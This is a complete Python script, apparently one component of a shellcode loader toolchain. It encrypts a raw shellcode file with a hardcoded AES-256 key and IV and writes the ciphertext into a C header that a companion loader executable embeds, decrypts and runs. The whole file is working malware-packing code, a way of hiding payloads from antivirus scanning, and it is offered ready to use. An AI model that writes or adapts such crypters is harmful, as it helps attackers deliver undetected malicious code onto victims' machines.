#!/usr/bin/env python3
# ============================================================
# encrypt_aes256.py — encrypt a raw shellcode file with the
# loader's AES-256-CBC key/IV + PKCS7 padding and emit a C
# header (payload.h) for aes256_loader_exe.cpp
#
# Usage:
#   python3 encrypt_aes256.py shellcode.bin [payload.h]
#
# If you change kAesKey/kAesIv in the loader, update them here
# and re-run this script.
# ============================================================
import sys
from Crypto.Cipher import AES

KEY = bytes([
    0x2B, 0x7E, 0x15, 0x16, 0x28, 0xAE, 0xD2, 0xA6, 0xAB, 0xF7, 0x15, 0x88, 0x09, 0xCF, 0x4F, 0x3C,
    0x76, 0x2E, 0x71, 0x60, 0xF3, 0x8B, 0x45, 0x6D, 0xF5, 0x3A, 0x67, 0x6C, 0x4D, 0xA1, 0xBC, 0xDE,
])
IV = bytes([
    0x5A, 0xE6, 0x1B, 0x3C, 0x8F, 0x72, 0x4D, 0x90, 0x17, 0xBE, 0x23, 0x48, 0xE9, 0x0C, 0x65, 0xFA,
])


def aes256_cbc_encrypt_pkcs7(data: bytes) -> bytes:
    pad = 16 - (len(data) % 16)
    data = data + bytes([pad]) * pad
    return AES.new(KEY, AES.MODE_CBC, IV).encrypt(data)


def main() -> None:
    if len(sys.argv) < 2:
        print(__doc__)
        sys.exit(1)
    infile = sys.argv[1]
    outfile = sys.argv[2] if len(sys.argv) > 2 else "payload.h"

    with open(infile, "rb") as f:
        raw = f.read()
    if not raw:
        print("[-] empty input file")
        sys.exit(1)

    ct = aes256_cbc_encrypt_pkcs7(raw)
    lines = ["// Auto-generated by encrypt_aes256.py — do not edit by hand", ""]
    lines.append("static const unsigned char kEncryptedShellcode[] = {")
    for i in range(0, len(ct), 12):
        chunk = ct[i:i + 12]
        lines.append("    " + ", ".join(f"0x{b:02X}" for b in chunk) + ",")
    lines.append("};")
    lines.append("static const SIZE_T kEncryptedSize = sizeof(kEncryptedShellcode);")
    lines.append("")

    with open(outfile, "w") as f:
        f.write("\n".join(lines))

    print(f"[+] {len(raw)} plaintext bytes -> {len(ct)} ciphertext bytes -> {outfile}")


if __name__ == "__main__":
    main()
